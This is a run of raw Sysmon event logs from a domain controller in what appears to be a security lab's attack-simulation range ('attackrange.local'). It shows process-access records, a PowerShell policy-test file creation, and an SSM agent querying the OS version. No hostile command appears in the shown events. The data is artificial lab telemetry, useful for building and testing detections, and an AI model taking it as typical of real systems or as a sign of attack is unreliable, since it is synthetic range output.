13:53:22.492{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8552-5FCF-4900-000000009101}3928C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001941Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.477{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-4900-000000009101}3928C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001940Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.477{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8552-5FCF-4900-000000009101}3928C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001939Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.430{10ACEC4A-8552-5FCF-4600-000000009101}38083816C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001938Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.336{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8552-5FCF-4700-000000009101}2568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001937Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.336{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8552-5FCF-4700-000000009101}2568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000001936Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.305{10ACEC4A-8552-5FCF-4700-000000009101}2568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_m3c5qadt.mmh.ps12020-12-08 13:53:22.305 10341000x80000000000000001935Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.289{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8552-5FCF-4700-000000009101}2568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001934Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.268{10ACEC4A-8552-5FCF-4800-000000009101}26202672C:\Windows\system32\conhost.exe{10ACEC4A-8552-5FCF-4700-000000009101}2568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001933Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.262{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-4800-000000009101}2620C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001932Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.261{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001931Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.260{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001930Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.260{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001929Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.260{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001928Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.260{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001927Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.260{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001926Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.260{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001925Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.260{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001924Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.260{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001923Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.259{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-4700-000000009101}2568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001922Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.259{10ACEC4A-8551-5FCF-3000-000000009101}15483788C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{10ACEC4A-8552-5FCF-4700-000000009101}2568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+5b01e 154100x80000000000000001921Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.259{10ACEC4A-8552-5FCF-4700-000000009101}2568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_OperatingSystem" "| Select-Object" "Version, OperatingSystemSKU" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 10341000x80000000000000001920Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.195{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8551-5FCF-3A00-000000009101}3808C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001919Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001918Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001917Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001916Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001915Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001914Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 